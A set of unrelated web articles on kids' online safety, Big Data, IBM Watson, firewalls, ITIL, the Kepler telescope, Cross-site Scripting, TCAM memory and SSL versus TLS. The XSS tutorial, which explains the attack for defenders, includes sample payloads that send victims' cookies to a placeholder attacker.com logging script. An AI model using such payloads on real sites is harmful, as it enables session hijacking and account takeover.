The Internet provides children with wonderful social and developmental opportunities. However, parents should never forget that cybercriminals and scammers are a constant source of danger online and that, like adults, children are not immune.
Children make extensive use of Internet resources such as search engines, social networks and email. All of these are potential sources of threats, such as links to phishing or pornographic websites, as well as adult-content spam, which may negatively affect a child’s psyche and expose the computer to the risk of malware infection.
What can parents do in this situation?
“Currently, the Internet Security products offered by many companies feature a setting that can be used to protect your child against a number of threats. You can choose the solution most suitable in terms of the possible restrictions, the flexibility of the settings, etc.,” explains Konstantin Ignatyev, Kaspersky Lab’s Web Content Analysts Group Manager. “Using built-in security solutions is just the first real step you can take to ensure that your child is protected against the potential dangers of the Internet.”
There are a number of additional ways to protect your child online:
- enable the SafeSearch features available in most popular search engines;
- configure special settings in social network and IM accounts;
- make use of email filters;
- install additional software to help control your child’s online activity;
- explain a set of simple rules to your child that must be followed when surfing the web.
Detailed instructions on settings can be found in the article ‘Kids on the Internet: safe surfing at home’ by Konstantin Ignatyev at: www.securelist.com. | <urn:uuid:cf42ffaa-f5b1-454e-ab5a-32100fad0326> | CC-MAIN-2017-04 | http://www.kaspersky.com/au/about/news/virus/2011/Safety_First_for_Children_Online | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560284270.95/warc/CC-MAIN-20170116095124-00084-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.911522 | 353 | 3.265625 | 3 |
How an Ancient Greek made the first Big Data decision and earned a fortune.
Thales was an ancient Greek philosopher who lived around 600 BC in Miletus, in present-day Turkey. He is enormously important in history because, before Thales, the only way to explain events was to tell stories about the Gods. Thunder? Well, it’s the sound made by the Cyclopes forging with their hammer the thunderbolts of Zeus. Obviously.
Thales introduced the idea that you could instead use data and intelligence to explain physical processes. He didn’t create the first “database”, but I would say he created the first Big Data database because he recorded all data he could get his hands on, whether it immediately seemed to be important or not. One of the first uses he put this database to was in predicting the weather.
Despite making so many contributions to what would later become Science, he took a lot of stick from his contemporaries.
“Hey, Thales – if you’re so clever, why are you not rich?”
He would patiently explain that the problems he was interested in were pure and interesting without necessarily being profitable. It is reasonable to imagine that this did not silence his critics, because he felt compelled to teach them a lesson.
Aristotle takes up the story in his book “Politics”.
“But he, deducing from his knowledge of stars that there would be a good crop of olives, while it was still winter raised a little capital and used it to pay deposits on all the oil-presses in Miletus and Chios, thus securing an option on their hire. This cost him only a small sum as there were no other bidders. Then the time of the harvest came and as there was a sudden and simultaneous demand for oil-presses, he hired them out at any price he liked to ask. He made a lot of money and so demonstrated that it is easy for philosophers to be rich, if they want to.”
What Thales had done here was to invent a way to monetise big data. He had also incidentally invented the ideas of “options” and “monopoly”. It makes me wonder whether the best thing we can do to stimulate the economy today is to mock a few philosophers …
The story of Thales illustrates one possibility you get with Big Data – you have the potential to found a totally new industry (for example Google) or to turn an older industry inside-out (like Amazon).
This is an opportunity that is open in all areas of business, not just in businesses completely built out of data like Google. Big Data is revolutionising astronomy, the car industry, professional sports, online gaming, Marketing etc. etc.
There are other advantages of the Big Data approach which aren’t quite as sexy, but are every bit as powerful.
With Big Data you can understand your customers better and so serve them better – harvest every bit of data on your customers and squeeze the pips out of it.
Result: Happy customers who stay with you and are quite likely to buy more of what you’re selling.
If you can understand your internal processes better, you can operate more efficiently and predictably.
Result: Happy stockholders.
You can also more effectively hunt for new customers.
Result: Everyone happy.
These last three points are almost a definition of how to run a business well – these are ambitions that businessmen from Ancient Greece would have recognised – it’s just that nowadays, with Big Data approaches you have a totally new way to get an edge over your competitors.
Big Data is something you should invest in, not because it is new and way-cool (although it is). You should invest in Big Data because it is a good investment that generates a positive financial return that can be measured in all the old-fashioned ways – customer volumes, revenue per customer and good old-fashioned cost savings.
And to finish, I can’t resist a quick piece of selling – EXASOL make the fastest, easiest to operate database in the world and it is exactly the engine you need to power your Big Data applications. You can download a free version of our software and try it with your data within minutes. | <urn:uuid:bcbbd3ba-ad34-4f9f-b778-fb325acdfb76> | CC-MAIN-2017-04 | http://www.exasol.com/en/blog/2015-04-01-first-big-data/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560284352.26/warc/CC-MAIN-20170116095124-00506-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.97418 | 885 | 3.234375 | 3 |
The pioneering “man-versus-machine” match on Jeopardy last night has a lot of people thinking, and writing, about artificial intelligence. Developing a machine capable of understanding the nuances of human language is one of the biggest computing challenges of our day. Natural language processing is a domain where most five-year-olds can outperform even the most powerful supercomputers. To illustrate, researchers often refer to the “Paris Hilton” problem. It is difficult for the machine to know whether the phrase refers to the celebrity or the hotel. IBM developed its Watson supercomputer to be able to handle these kinds of complex language processing tasks, to understand the finer points of human language, such as subtlety and irony.
Last night was Watson’s official debut in the first night of a two-game match. Ending in a tie, Watson has proven to be a worthy opponent, well-matched to human champions Ken Jennings and Brad Rutter. With “Paris Hilton” type problems, Watson would use additional clues (for example, if provided with the phrase “Paris Hilton reservation”) to distinguish the two meanings. Drawing from a vast knowledge databank, the supercomputer relies on its ability to link similar concepts to come up with several best guesses. Then it uses a ranking algorithm to select the answer with the highest probability of correctness.
Watson’s performance on Jeopardy signifies a big leap for the field of machine learning. The next big advance will come when Watson, or another, possibly similar, machine beats the Turing test. A successful outcome occurs when, in the context of conversation, we can no longer tell the difference between a human and a computer. Some maintain that a machine cannot truly be considered intelligent until it has passed this litmus test, while others criticize the test for using too narrow a definition of intelligence.
Although the Jeopardy match could be considered mere entertainment, or clever marketing depending on how you look at it, there are commercial applications which IBM plans to develop in fields as diverse as healthcare, education, tech support, business intelligence, finance and security.
Turing test aside, Watson’s abilities speak to considerable progress on the AI front, with real-world implications. If you think of artificial intelligence as a continuum, let’s say a ladder, instead of a discrete step, then one of the bottom and more attainable rungs could be labeled “intelligence augmentation,” with the highest rungs reserved for a true thinking machine, a la the Singularity theory, most commonly associated with futurist Ray Kurzweil.
Both of these concepts have received some attention recently with The New York Times’ John Markoff citing major developments in intelligence augmentation and a Time Magazine article providing a thorough treatment of the Singularity model.
According to Markoff, “Rapid progress in natural language processing is beginning to lead to a new wave of automation that promises to transform areas of the economy that have until now been untouched by technological change.”
Markoff cites personal computing as a major component in the rise of intelligence augmentation, in that it has provided humans with the tools for gathering, producing and sharing information and has pretty much single-handedly created a generation of knowledge workers.
The editor of the Yahoo home page, Katherine Ho, uses the power of computers to reorder articles to achieve maximum readership. With the help of specialized software, she can fine-tune the articles based on readers’ tastes and interests. Markoff refers to Ms. Ho as a “21st-century version of a traditional newspaper wire editor,” who instead of relying solely on instinct, bases decisions on computer-vetted information.
An example of computational support taken one step further is the Google site, which relies solely on machine knowledge to rank its search results. As Markoff notes, computational software can be used to extend the skills of a human worker, but it can also be used to replace the worker entirely.
Markoff concludes that “the real value of Watson may ultimately be in forcing society to consider where the line between human and machine should be drawn.”
The Singularity, the subject of the Time Magazine article, also deals with the dividing line between human and machine, but takes the idea quite a bit further. In his 2001 essay The Law of Accelerating Returns, Kurzweil defines the Singularity as “a technological change so rapid and profound it represents a rupture in the fabric of human history.” It can also be explained as the point in the future when technological advances begin to happen so rapidly that normal humans cannot keep pace, and are “cut out of the loop.” Kurzweil predicts this transformative event will occur by the year 2045, a mere 35 years away.
We don’t know what such a radical change would entail because by the very nature of the prediction, we’re not as smart as the future machines will be. But the article cites some of the many theories: Humankind could meld with machines to become super-intelligent cyborgs. We could use life science advances to delay the effects of old age and possibly cheat death indefinitely. We might be able to download our consciousness into software. Or perhaps the future computational network will turn on humanity, a la Skynet. As Lev Grossman, author of the Time Magazine article, writes, “the one thing all these theories have in common is the transformation of our species into something that is no longer recognizable” from our current vantage point.
How can such an earth-shattering event possibly occur by the year 2045, you wonder. Well, the simple answer is that computers are getting much faster, but more pertinently, the speed at which computers are getting faster is also increasing. Supercomputers, for example, are growing roughly one thousand times more powerful every decade. Doing the math, we see a staggering billion-fold increase in only 30 years. This is the law of accelerating returns in action, and this exponential technology explosion is what will propel the Singularity, according to its supporters.
This degree of computational progress is almost impossible for the human mind to fully grasp; humans naturally intuit that the pace of change will continue at the current rate. We have evolved to accept linear advances or small degrees of exponential inclines, but the massive advances proposed by Singularity supporters truly boggle the mind. This is something Kurzweil is quick to point out in his books and his public speaking engagements.
As for assertions that Kurzweil is underestimating the difficulty of the challenges involved with advanced machine intelligence, for example the complexity of reverse-engineering the human brain, Kurzweil responds in kind, charging his critics with underestimating the power of exponential growth.
To the naysayers, Grossman responds:
You may reject every specific article of the Singularitarian charter, but you should admire Kurzweil for taking the future seriously. Singularitarianism is grounded in the idea that change is real and that humanity is in charge of its own fate and that history might not be as simple as one damn thing after another. Kurzweil likes to point out that your average cell phone is about a millionth the size of, a millionth the price of and a thousand times more powerful than the computer he had at MIT 40 years ago. Flip that forward 40 years and what does the world look like? If you really want to figure that out, you have to think very, very far outside the box. Or maybe you have to think further inside it than anyone ever has before. | <urn:uuid:5b414987-82c0-4fc4-8cef-298e578a0a0f> | CC-MAIN-2017-04 | https://www.hpcwire.com/2011/02/15/watsons_debut_sparks_intelligent_conversation/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281421.33/warc/CC-MAIN-20170116095121-00222-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.940295 | 1,598 | 2.859375 | 3 |
By now, you already know that installing a firewall is very important. Firewalls protect your network, and the data being sent on it, from outside and inside threats. They inspect traffic, prevent unauthorized access to internal networks, and protect against external threats.
Not having the right firewall is going to cost your business both financially and in reputation.
Because you know the importance of having a firewall up and running, we’re going to go over the notable strides that firewalls are currently making, and how they are going to save you in 2017 more than ever.
In recent years, many major websites have been knocked offline by Denial of Service (DoS) and Distributed Denial of Service (DDoS) attacks. These attacks bring on a sudden reduction in bandwidth and performance usually with no warning. According to research from Kaspersky Lab, one in five working IT professionals do not have protection against DDoS attacks, with many not knowing what steps to take if their system is attacked.
Attackers are increasing the potency of the malware attached to their botnets, making their attacks more significant. Hackers can and will continue to exploit device vulnerabilities to launch more DDoS attacks. Modern firewalls, like Palo Alto and Cisco ASA, are now learning to help identify and stop these DDoS attacks at their most basic levels.
It’s important to confirm that you have monitoring systems in place before replacing or investing in new systems. Log monitoring, intrusion detection systems, and intrusion prevention systems can detect DDoS threats before they become actual breaches.
If you combine these resources, you’re giving yourself a more intensive solution for protection against potentially dangerous traffic.
Hackers have been using ports for access as long as ports have existed. Most ISPs have standard ports they use, so it’s really easy for hackers to figure out the configuration and deploy attacks. If there are specific services that you want to protect from an attack, you should use alternative ports, also known as masquerade ports.
For instance, Remote Desktop Protocol (Port 3389) is a commonly used port that cyber criminals frequently target during attacks. To prevent them from using this port, you can manually change the RDP port to another port, and configure the firewall to translate that port to the standard RDP port. This process is known as filter-based forwarding — and if you don’t already know how to do it, we can show you.
Knowing how to forward ports can help you out whether you’re studying for Juniper security or CompTIA Security+ certs, or if you just want to learn a bit more about port security.
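To make the translation idea concrete, here is a toy sketch in Python of what a port-translation rule accomplishes: a relay that accepts connections on an alternate port and forwards them to the standard RDP port. The listening port and internal address are illustrative assumptions, and a real firewall performs this translation in its packet-processing engine rather than in a user-space script like this one.

```python
import socket
import threading

LISTEN_PORT = 3390                 # illustrative alternate ("masquerade") port
TARGET = ("10.0.0.25", 3389)       # placeholder internal host, standard RDP port

def pipe(src, dst):
    # Copy bytes one way until the sender closes its side of the connection.
    while data := src.recv(4096):
        dst.sendall(data)
    dst.close()

def serve():
    listener = socket.socket()
    listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    listener.bind(("0.0.0.0", LISTEN_PORT))
    listener.listen()
    while True:
        client, _ = listener.accept()
        upstream = socket.create_connection(TARGET)
        threading.Thread(target=pipe, args=(client, upstream), daemon=True).start()
        threading.Thread(target=pipe, args=(upstream, client), daemon=True).start()

if __name__ == "__main__":
    serve()
```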
It would be surprising if you hadn’t heard about everyday devices becoming embedded with electronics, software, sensors, actuators, and network connectivity that enable them to collect and exchange data.
The internetworking of these devices is being called the Internet of Things (IoT). The concept of the IoT is growing every day. IoT devices are also increasing the potential attack surface for hackers. DDoS bots have the ability to target devices and use them to commence a DDoS attack.
Installing a firewall to protect your new devices could be key to shielding them from the threats that hackers are creating daily. You also might want to encrypt data on the IoT device and en route to and from other IoT devices.
You might consider segmenting IoT devices from the rest of the network as part of a Zero Trust architecture. Additionally, you can add proper hooks in the software so that operators can perform identity and access management (IAM).
In choosing a firewall protection system, you should definitely consider options with additional features. Certain types of firewalls send alerts to admins the moment attacks happen. There are also options that integrate VPNs within their architecture for remote workers. You should always choose a firewall vendor with strong customer support that provides the necessary help and resources to ensure the security of your network. For instance, you might want to consider Palo Alto versus Cisco ASA. (Or vice versa.)
Firewalls exist to help you evaluate your company’s security risks. They are evolving rapidly as a cloud technology as software-defined networks take hold. This is going to open the door to drastic changes in the current firewall model, or it might even create a completely new category of network protection.
Regardless, we’re going to get you the most current training on whichever direction firewall security goes and make sure that you are a firewall expert.
Set yourself up in 2017 for security and safety by bringing in a firewall. You can thank us later.
The Information Technology Infrastructure Library (ITIL) is growing in popularity among IT leaders. However, many IT leaders don't truly understand ITIL basics, and many see it as a quick solution to IT chaos. In reality, blindly following ITIL is doomed to failure.
This note addresses the following topics:
- What ITIL is and how it works.
- Users of ITIL.
- Benefits of ITIL.
- ITIL basic structure and overview of ITIL core concepts.
- What ITIL is not – common misconceptions about ITIL.
ITIL involves adopting and adapting IT processes and approaches that are new to many SMEs. IT leaders must establish specific goals prior to adopting this framework. | <urn:uuid:5062e1ce-84ad-401b-86be-4a4b30fadc73> | CC-MAIN-2017-04 | https://www.infotech.com/research/best-practices-in-itil-service-management | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279933.49/warc/CC-MAIN-20170116095119-00435-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.905519 | 147 | 2.671875 | 3 |
NASA's Kepler space telescope is in trouble.
The telescope, launched in 2009 in search of Earth-like planets, has lost the use of one of the four wheels that control its orientation in space. Kepler, for the second time this month, has gone into safe mode, NASA reported Wednesday afternoon.
With NASA no longer able to manipulate the telescope's positioning, ground engineers also are having a hard time communicating with it since the communications link comes and goes as the spacecraft spins uncontrollably.
This is the second wheel failure Kepler has suffered.
"This is a clear indication that there has been an internal failure within the reaction wheel, likely a structural failure of the wheel bearing," NASA reported. "With the failure of a second reaction wheel, it's unlikely that the spacecraft will be able to return to the high pointing accuracy that enables its high-precision photometry. However, no decision has been made to end data collection."
The telescope is stable and safe at this point. Engineers, though, are working to minimize the amount of fuel that the spacecraft is using while they try to control its orientation with its thrusters.
Kepler has been considered a success, wrapping up its primary three-and-a-half-year mission and entering a second phase of research last November. NASA scientists had been hoping that Kepler would continue working for another four years.
Since it began its work on May 12, 2009, the telescope has searched more than 100,000 stars for signs of Earth-like planets in the habitable zone, an area that may have water. The telescope has so far confirmed more than 100 such planets.
The telescope is onboard a spacecraft that is carrying several computers. Kepler is designed to measure the brightness of stars every half hour, allowing scientists to detect any dimming that would be caused by orbiting planets passing in front of them.
Scientists receive enough data from Kepler to determine not only the size of a planet but also whether it has a solid surface and its potential to hold water, something considered crucial to the formation of life.
Last month, the space agency announced that Kepler had discovered two planets that are perfectly sized and positioned to potentially hold life.
Scientists are not saying they actually have discovered life on the newfound planets, which are about 1,200 light years away. However, they did say they're one step closer to finding a world similar to Earth that orbits a star like our sun.
NASA announced on Wednesday that even if Kepler's mission is over, it has gathered enough information to keep scientists busy analyzing it for years.
This story, "NASA's planet-hunting telescope is spinning out of control" was originally published by Computerworld. | <urn:uuid:dc4aaf48-5fec-484f-95bf-60460052da99> | CC-MAIN-2017-04 | http://www.itworld.com/article/2710631/hardware/nasa-s-planet-hunting-telescope-is-spinning-out-of-control.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560285289.45/warc/CC-MAIN-20170116095125-00461-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.963548 | 646 | 3.21875 | 3 |
To understand the Cross-site Scripting vulnerability you first have to understand the basic concept of the Same Origin Policy (SOP), which forbids websites from retrieving content from pages with another origin. By forbidding access to cross-origin content, SOP ensures that random websites cannot read or modify data from your Facebook page or PayPal account while you are logged in to them.
SOP is one of the most important security principles in every web browser. For example, the page https://example.com/index.html can access content from other pages on https://example.com, while https://attacker.com/index.html cannot access content from https://example.com.
The Cross-site Scripting (XSS) Vulnerability
Cross-site Scripting, also known as XSS, is a way of bypassing the SOP concept. Whenever HTML code is generated dynamically and user input is not sanitized before being reflected on the page, an attacker can inject his own HTML code. The web browser will still execute the injected code, since from the browser's point of view it belongs to the website where it was injected.
Different Types of Cross-Site Scripting Vulnerability
There are three main types of Cross-site Scripting vulnerability: Stored, Reflected and DOM XSS. Below you can find a detailed technical explanation of each of them.
Stored Cross-site Scripting Vulnerability
A Stored Cross-site Scripting vulnerability happens when the payload is saved, for example in a database, and is then executed when a user opens the affected page. Stored cross-site scripting is very dangerous for a number of reasons:
- The payload is not visible to the browser's XSS filter
- Users might accidentally trigger the payload simply by visiting the affected page, while a crafted URL or specific form input would be required for exploiting reflected XSS.
Example of a Stored XSS
A stored XSS vulnerability can happen if the username of an online forum member is not properly sanitized when it is printed on the page. In that case an attacker can insert malicious code when registering a new user on the forum.
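For illustration, suppose the attacker registers the username user123 followed by a script tag. The exact markup below is an assumption, and attacker.com/log.php stands in for any attacker-controlled endpoint. When the username is reflected on the member's profile, the page source would look something like this:

```html
user123<script>
  document.location = 'https://attacker.com/log.php?c='
    + encodeURIComponent(document.cookie);
</script>
Registered since: 2016
```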
The above code is triggered every time a user visits this forum section, and it sends the users' forum cookies to the attacker, who is then able to use them to hijack their sessions. Stored XSS can be a very dangerous vulnerability since it can have the effect of a worm, especially when exploited on popular pages.
For example, imagine a forum or social media website with a public-facing page that is vulnerable to a stored XSS vulnerability, such as the user's profile page. If the attacker is able to place a malicious payload that adds itself to the profile page, the payload will spread itself with exponential growth as each visitor opens it.
Reflected Cross-site Scripting (XSS) Vulnerability
A reflected XSS vulnerability happens when user input from a URL or POST data is reflected on the page without being stored. This means that an attacker has to send the victim a crafted link or post form to deliver the payload, and the victim has to click the link. This kind of payload is also generally caught by built-in browser XSS filters, such as those in Chrome, Internet Explorer or Edge.
Example of a Reflected XSS
As an example we will use the search functionality of a news website, which takes the user's input from the q parameter of the GET request and appends it to the page, as per the example below:
https://example.com/news?q=data+breach
In the search results the website reflects the content of the query that the user searched for, such as:
You searched for "data breach":
If the search functionality is vulnerable to a reflected cross-site scripting vulnerability, the attacker can send the victim a link such as the one below:
https://example.com/news?q=<script>document.location='https://attacker.com/log.php?c=' + encodeURIComponent(document.cookie)</script>
Once the victim clicks on the link, the website will display the following:
You searched for "<script>document.location='https://attacker.com/log.php?c=' + document.cookie</script>":
The HTML source code, reflecting the attacker's malicious code, redirects the victim to a website controlled by the attacker, which can then record the user's current cookie for example.com, passed as a GET parameter.
DOM Based Cross-Site Scripting Vulnerability
The DOM Based XSS vulnerability happens in the DOM (Document Object Model) instead of in the HTML source. Read DOM Based Cross-site Scripting (XSS) vulnerability for a detailed explanation of DOM XSS.
Impacts of the Cross-site Scripting Vulnerability
The impact of an exploited XSS vulnerability varies a lot, ranging from session hijacking to the disclosure of sensitive data, CSRF attacks and more. By exploiting a cross-site scripting vulnerability an attacker can impersonate the victim and take over the account. If the victim has administrative rights, it might even lead to code execution on the server, depending on the application and the privileges of the account. Read about the apache.org JIRA incident for more information on how an XSS vulnerability was used in a successful attack that also led to code execution.
Preventing XSS Vulnerabilities
Even though most modern web browsers have an inbuilt XSS filter, it should not be seen as an alternative to sanitization. Such filters cannot catch all kinds of cross-site scripting attacks, and they are deliberately not strict, so as to avoid false positives that would prevent some pages from loading correctly. A web browser's XSS filter should only be a "second line of defense"; the idea is to minimise the impact of existing vulnerabilities.
Developers should not use blacklists, as there is a variety of bypasses for them. They should also avoid stripping dangerous functions and characters, since browsers' XSS filters cannot recognize dangerous payloads once the output has been tampered with, which opens the door to bypasses. That being said, the only recommended prevention of XSS is proper output encoding.
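As a minimal sketch of what output encoding means in practice (using Python's standard html module; the username value is just an example):

```python
from html import escape

username = "user123<script>alert(document.cookie)</script>"

# Escaping converts markup characters into harmless HTML entities before the
# value is written into an HTML context, so the browser renders it as text
# instead of executing it.
print(escape(username, quote=True))
# user123&lt;script&gt;alert(document.cookie)&lt;/script&gt;
```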
As this is a networking blog, I will focus mostly on the usage of CAM and TCAM memory in routers and switches. I will explain TCAM's role in the router prefix lookup process and in switch MAC address table lookups. However, when we talk about this specific topic, most of you will ask: how is this memory built from an architectural standpoint? How is it made so that it can perform lookups faster than any other hardware or software solution? That is the reason for the second part of the article, where I will try to explain briefly how the most common TCAM memories are built to deliver the capabilities they have.
CAM and TCAM memory
Ternary Content Addressable Memory (TCAM) inside routers is used for faster address lookups, which enables fast routing. In switches, Content Addressable Memory (CAM) is used for building and looking up the MAC address table that drives L2 forwarding decisions. By implementing router prefix lookup in TCAM, we move the Forwarding Information Base lookup from software to hardware. This makes the address search independent of the number of prefix entries, because TCAM's main characteristic is that it is able to search all its entries in parallel. It means that no matter how many address prefixes are stored in TCAM, the router will find the longest prefix match in one iteration. It's magic, right?
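To see what that parallel search replaces, here is a minimal software sketch of longest-prefix matching over a hypothetical FIB (the prefixes and next hops are made up). In software the lookup cost grows with the table size; a TCAM compares the destination against every stored prefix at once and returns the longest match in a single operation.

```python
import ipaddress

# Hypothetical FIB: prefix -> next hop.
fib = {
    ipaddress.ip_network("10.0.0.0/8"):  "192.0.2.1",
    ipaddress.ip_network("10.1.0.0/16"): "192.0.2.2",
    ipaddress.ip_network("10.1.2.0/24"): "192.0.2.3",
}

def longest_prefix_match(destination):
    addr = ipaddress.ip_address(destination)
    best = None
    for prefix, next_hop in fib.items():
        # Keep the matching prefix with the longest mask seen so far.
        if addr in prefix and (best is None or prefix.prefixlen > best[0].prefixlen):
            best = (prefix, next_hop)
    return best[1] if best else None

print(longest_prefix_match("10.1.2.40"))  # 192.0.2.3 -- the /24 wins
```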
In routers, like high-end Cisco ones, TCAM is used to enable CEF (Cisco Express Forwarding) in hardware. CEF builds the FIB from the RIB (routing table), and builds the adjacency table from the ARP table so that pre-prepared L2 headers exist for every next-hop neighbor.
SSL versus TLS – What’s the difference?
SSL versus TLS
TLS (Transport Layer Security) and SSL (Secure Sockets Layer) are protocols that provide data encryption and authentication between applications and servers in scenarios where that data is being sent across an insecure network, such as checking your email (How does the Secure Socket Layer work?). The terms SSL and TLS are often used interchangeably or in conjunction with each other (TLS/SSL), but one is in fact the predecessor of the other — SSL 3.0 served as the basis for TLS 1.0 which, as a result, is sometimes referred to as SSL 3.1. With this said though, is there actually a practical difference between the two?
See also our Infographic which summarizes these differences.
Which is more secure – SSL or TLS?
It used to be believed that TLS v1.0 was only marginally more secure than SSL v3.0, its predecessor. However, SSL v3.0 is getting very old and recent developments, such as the POODLE vulnerability have shown that SSL v3.0 is now completely insecure (especially for web sites using it). Even before the POODLE was set loose, the US Government had already mandated that SSL v3 not be used for sensitive government communications or for HIPAA-compliant communications. If that was not enough … POODLE certainly was. In fact, as a result of POODLE, SSL v3 is being disabled on web sites all over the world and for many other services as well.
SSL v3.0 is effectively “dead” as a useful security protocol. Places that still allow its use for web hosting are placing their “secure web sites” at risk; organizations that allow SSL v3 use to persist for other protocols (e.g. IMAP) should take steps to remove that support at the soonest software update maintenance window.
Subsequent versions of TLS (v1.1 and v1.2) are significantly more secure and fix many vulnerabilities present in SSL v3.0 and TLS v1.0. One example is the BEAST attack, which can completely break web sites running on older SSL v3.0 and TLS v1.0 protocols. The newer TLS versions, if properly configured, prevent the BEAST attack and other attack vectors and provide many stronger ciphers and encryption methods.
Unfortunately, even now a majority of web sites do not use the newer versions of TLS and permit weak encryption ciphers. Check how well your favorite web site is configured.
But wait — are not TLS and SSL different encryption mechanisms?
If you set up an email program, you will often see separate options for “no encryption”, “SSL”, or “TLS” encryption of your transmission. This leads one to assume that TLS and SSL are very different things.
In truth, this labeling is a misnomer. You are not actually selecting which method to use (SSL v3 or TLS v1.x) when making this choice. You are merely selecting between options that dictate how the secure connection will be initiated.
No matter which “method” you choose for initiating the connection, TLS or SSL, the same level of encryption will be obtained when talking to the server and that level is determined by the software installed on the server, how that is configured, and what your program actually supports.
If the SSL vs TLS choice is not SSLv3 vs TLS v1.0+, what is it?
There are two distinct ways that a program can initiate a secure connection with a server:
- By Port (a.k.a. implicit): Connecting to a specific port means that a secure connection should be used. For example, port 443 for https (secure web), 993 for secure IMAP, 995 for secure POP, etc. These ports are set up on the server ready to negotiate a secure connection first, and do whatever else you want second.
- By Protocol (a.k.a. explicit): These connections first begin with an insecure “hello” to the server and only then switch to secured communications after the handshake between the client and the server is successful. If this handshake fails for any reason, the connection is severed. A good example of this is the command “STARTTLS” used in outbound email (SMTP) connections.
The “By Port” method is commonly referred to as “SSL” or “implicit” and the “By Protocol” method is commonly referred to as “TLS” or “explicit” in many program configuration areas.
Sometimes, you have only the option to specify the port and whether a secure connection should be made, and the program itself guesses from that which method should be used … many old email programs like Outlook and Mac Mail did that. In such cases, you need to know if the program will try an implicit or explicit connection to initiate security, and choose your port appropriately (or else the connection could fail).
To Review: In email programs and other systems where you can select from SSL or TLS together with the port a connection will be made on:
- SSL means a “by port” implicit connection to a port that expects the session to start with security negotiation
- TLS means a “by protocol” explicit connection where the program will connect “insecurely” first and use special commands to enable encryption (a short sketch of both follows this list).
- Use of either could result in a connection encrypted with either SSL v3 or TLS v1.0+, based on what is installed on the server and what is supported by your program.
- Both methods of connection (implicit and explicit) result in equally secure communications.
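As a concrete sketch of the two styles using Python's standard smtplib (mail.example.com is a placeholder host; ports 465 and 587 follow common conventions):

```python
import smtplib
import ssl

host = "mail.example.com"  # placeholder server name
context = ssl.create_default_context()

# "By port" (implicit): port 465 is dedicated to SSL/TLS-wrapped SMTP,
# so the connection is encrypted from the very first byte.
with smtplib.SMTP_SSL(host, 465, context=context) as server:
    server.noop()

# "By protocol" (explicit): connect in plain text on port 587, then issue
# the STARTTLS command to upgrade before sending anything sensitive.
with smtplib.SMTP(host, 587) as server:
    server.starttls(context=context)
    server.noop()
```

Either way, the resulting session is protected by whatever SSL/TLS version the two ends negotiate.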
Sidebar: It is unclear why the “By Protocol” method is referred to as “TLS” as it could result in either TLS or SSL actually being used. It is likely because the folks who designed the SMTP protocol decided to name their command to switch to SSL/TLS in the SMTP protocol to “STARTTLS” (using “TLS” in the name as that is the newer protocol name). Then email programs started listing “TLS” next to this and “SSL” next to the old “By Port” option which came first. Once they started labeling things this way, that expanded to general use in the configuration of other protocols (like POP and IMAP) for “consistency”. I am not certain if this is the real reason, but based on my experience dealing with all versions of email programs and servers over the last 15 years, it seems very plausible.
Both methods ensure that your data is encrypted as it is transmitted across the Internet. They also both enable you to be sure that the server you are communicating with is the server you intend to contact and not some “middle man eavesdropper“. This is possible because servers that support SSL and TLS must have certificates issued to them by a trusted third party, like Verisign or Thawte. These certificates verify that the domain name they are issued for really belongs to the server (all about SSL certificates). Your computer will issue warnings to you if you try to connect to a server and the certificate that it gets back is not trusted or doesn’t match the site you are trying to connect to.
So then, should I choose TLS or SSL?
If you are configuring a server, you must install software that supports the latest version of the TLS standard, and configure it properly. This ensures that the connections that your users make are as secure as possible. Using an excellent security certificate will also help a lot — e.g. one with 2048+ bit keys, Extended Validation, etc. You should avoid using SSL v3 and should use only strong ciphers, especially if compliance of any kind is required.
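For instance, a server written against Python's ssl module could refuse the older protocols outright. This is a hedged sketch: the certificate file names are placeholders, and the minimum_version attribute requires Python 3.7 or newer.

```python
import ssl

context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
context.minimum_version = ssl.TLSVersion.TLSv1_2  # reject SSLv3, TLS 1.0/1.1
context.load_cert_chain(certfile="server.crt", keyfile="server.key")
```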
If you are configuring a program (especially an email program) and have the option to connect securely via SSL or TLS, you should feel free to choose either one … as long as it is supported by your server.
Note: many web browsers have special preference areas that allow you to specifically enable/disable SSL v2, SSL v3, TLS v1.0, etc. In these cases you are actually telling the browser which versions of these security protocols it is allowed to use when establishing secure connections. We recommend turning off SSL v2 and SSL v3 (they provide no real security). Some web sites may support SSL v3 only; if you encounter one of these … please let them know that they are seriously behind the times and doing themselves and their visitors a serious disservice by pretending to provide safety while actually only providing broken, ancient encryption.
What happens if I do not select either one?
If neither SSL nor TLS is used, then the communications between you and the server can easily become a party line for eavesdroppers. Your data and your login information are sent in plain text for anyone to see; there is no guarantee that the server you connect to is not some middle man or interloper. For more on this, see: the case for email security.
Does LuxSci support these security protocols?
SSL/TLS form the basis of client-server security used by LuxSci for all of its services. Our web servers do not support SSL v3.0 and do support TLS v1.2; our web sites are protected against the BEAST and POODLE attacks. We use only strong, NIST-recommend ciphers for compliance reasons. We offer a variety of ports for connecting securely to POP, IMAP, and SMTP using both implicit and explicit methods for establishing TLS encryption. LuxSci also offers MySQL and WebMail over SSL and provides SSL for web hosting clients.
To ensure the integrity and security of your data, LuxSci strongly recommends taking advantage of our secure capabilities, such as enforced use of PGP, S/MIME, TLS, and email Escrow protocols.
Update for July, 2016: What about TLS v1.3?
TLS v1.3 is still an Internet Draft and the specifications for what will finally be in it and how exactly it will differ from v1.2 are not finalized. However, we do know some of things that v1.3 is going to provide. These include the complete removal of things that are known to be cryptographically weak such as MD5, RC4, and weak elliptic curves; dropping support for seldom-used features like compression and “change cipher” ciphers; and adding new elliptic curves.
Once TLS v1.3 is finalized and stable in the standard TLS libraries (e.g. openssl), I imagine we will see a strong push to move further away from TLS v1.0 and v1.1 and to use v1.2 and v1.3 exclusively. This seems to be the rapid trend. Who knows, maybe TLS v1.4 will start to include some of Google’s New Hope post-quantum algorithms.
- TLS Protocol RFC
- How Does Secure Socket Layer (SSL or TLS) Work?
- What is TLS/SSL?
